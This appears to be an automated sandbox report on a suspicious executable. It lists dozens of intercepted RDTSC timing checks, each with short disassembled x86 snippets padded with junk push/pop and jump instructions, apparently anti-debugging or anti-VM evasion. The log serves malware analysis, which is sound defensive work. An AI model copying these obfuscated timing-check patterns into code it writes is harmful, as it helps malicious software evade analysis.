Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31EE78 second address: 31EE7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31EE7E second address: 31EE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F625CED05B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31EE89 second address: 31EE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF246Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F19F second address: 31F1A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F43A second address: 31F43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F43E second address: 31F446 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F446 second address: 31F469 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F625CDF246Ah 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F625CDF2471h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 31F469 second address: 31F46F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 323AA9 second address: 323AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 323AAD second address: 323ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F625CED05B8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 323ABD second address: 323AD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32C69B second address: 32C69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A965 second address: 32A9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF2473h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c ja 00007F625CDF247Bh 0x00000012 jmp 00007F625CDF2473h 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F625CDF2466h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A9A2 second address: 32A9A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32A9A6 second address: 32A9AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32AC8E second address: 32AC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F625CED05B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32AC98 second address: 32AC9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32AC9C second address: 32ACA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32ACA6 second address: 32ACB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F625CDF2466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32ACB0 second address: 32ACB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32ACB4 second address: 32ACD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jbe 00007F625CDF2496h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F625CDF2471h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32ACD6 second address: 32ACDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B0FE second address: 32B11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF2477h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B11B second address: 32B122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B122 second address: 32B129 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B129 second address: 32B133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32B3EB second address: 32B3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BE14 second address: 32BE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32BE1A second address: 32BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 jmp 00007F625CDF2470h 0x0000000d pop edx 0x0000000e ja 00007F625CDF2472h 0x00000014 jng 00007F625CDF2466h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 32C516 second address: 32C51C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331F79 second address: 331F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 je 00007F625CDF246Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331B27 second address: 331B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331B43 second address: 331B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F625CDF246Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 331CBC second address: 331CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F625CED05B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 341613 second address: 341636 instructions: 0x00000000 rdtsc 0x00000002 je 00007F625CDF2466h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f jo 00007F625CDF2466h 0x00000015 pop eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jno 00007F625CDF2466h 0x0000001f pop edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 341636 second address: 34163E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 343260 second address: 343282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CDF246Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F625CDF246Dh 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 34A941 second address: 34A945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35167B second address: 351696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F625CDF246Dh 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jnl 00007F625CDF2466h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 351696 second address: 35169B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 352D0C second address: 352D11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 354E9A second address: 354EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 354EA5 second address: 354EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 354EAB second address: 354ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CED05BCh 0x00000009 popad 0x0000000a jmp 00007F625CED05C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 354ECD second address: 354ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35D416 second address: 35D423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F625CED05B8h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35D423 second address: 35D42D instructions: 0x00000000 rdtsc 0x00000002 je 00007F625CDF2479h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35BF8E second address: 35BFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F625CED05C6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35C12E second address: 35C140 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F625CDF246Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35C140 second address: 35C159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007F625CED05C8h 0x0000000b jmp 00007F625CED05BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 35C27A second address: 35C284 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 360DB3 second address: 360DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 360DB7 second address: 360DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F625CDF2466h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 360DC9 second address: 360DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36D502 second address: 36D506 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36D506 second address: 36D50A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36D50A second address: 36D513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36D513 second address: 36D529 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F625CED05C1h 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36D529 second address: 36D54E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F625CDF2466h 0x00000010 jmp 00007F625CDF2475h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 374475 second address: 374482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F625CED05BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 374482 second address: 374490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F625CDF2466h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 374490 second address: 374494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36BD74 second address: 36BD7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F625CDF2466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36BD7E second address: 36BD92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CED05C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36BD92 second address: 36BDC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF246Fh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F625CDF246Eh 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 36BDC0 second address: 36BDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2812A5 second address: 2812C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F625CDF2466h 0x00000010 jc 00007F625CDF2466h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007F625CDF2466h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3817C9 second address: 3817D3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F625CED05B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38137F second address: 3813A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F625CDF2477h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F625CDF246Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3813A4 second address: 3813A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 399574 second address: 39957A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3996FA second address: 399702 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 399702 second address: 399706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 399706 second address: 39970A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39970A second address: 399714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3999AD second address: 3999BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F625CED05BAh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3999BC second address: 3999DE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F625CDF247Bh 0x00000008 jmp 00007F625CDF2473h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 399F9B second address: 399FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F625CED05C8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 399FB9 second address: 399FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39CEF3 second address: 39CEFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39D1FE second address: 39D298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jno 00007F625CDF2468h 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F625CDF2477h 0x00000014 nop 0x00000015 mov dh, ah 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F625CDF2468h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov dword ptr [ebp+122D31CFh], ecx 0x00000039 call 00007F625CDF2469h 0x0000003e pushad 0x0000003f jmp 00007F625CDF246Eh 0x00000044 push edx 0x00000045 jg 00007F625CDF2466h 0x0000004b pop edx 0x0000004c popad 0x0000004d push eax 0x0000004e push ebx 0x0000004f jmp 00007F625CDF2470h 0x00000054 pop ebx 0x00000055 mov eax, dword ptr [esp+04h] 0x00000059 push eax 0x0000005a push edx 0x0000005b jng 00007F625CDF246Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39D298 second address: 39D29C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39D4C7 second address: 39D4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39D4CD second address: 39D4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39D4D8 second address: 39D5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F625CDF2468h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000019h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push dword ptr [ebp+12450D78h] 0x00000027 push 00000000h 0x00000029 push edi 0x0000002a call 00007F625CDF2468h 0x0000002f pop edi 0x00000030 mov dword ptr [esp+04h], edi 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc edi 0x0000003d push edi 0x0000003e ret 0x0000003f pop edi 0x00000040 ret 0x00000041 mov dword ptr [ebp+12450E04h], ecx 0x00000047 call 00007F625CDF2469h 0x0000004c jnc 00007F625CDF2489h 0x00000052 push eax 0x00000053 jmp 00007F625CDF2474h 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c jmp 00007F625CDF2475h 0x00000061 mov eax, dword ptr [eax] 0x00000063 push ecx 0x00000064 jg 00007F625CDF2477h 0x0000006a pop ecx 0x0000006b mov dword ptr [esp+04h], eax 0x0000006f push edx 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39FE4C second address: 39FE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F625CED05BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 39FE62 second address: 39FE6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F625CDF2466h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A1BFB second address: 3A1C22 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F625CED05B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F625CED05C7h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A1C22 second address: 3A1C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3A1C26 second address: 3A1C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A30101 second address: 4A30162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 mov edx, esi 0x0000000a pushfd 0x0000000b jmp 00007F625CDF2472h 0x00000010 xor ax, 9C68h 0x00000015 jmp 00007F625CDF246Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F625CDF2476h 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F625CDF2477h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10E5D second address: 4A10E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4A10E61 second address: 4A10E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
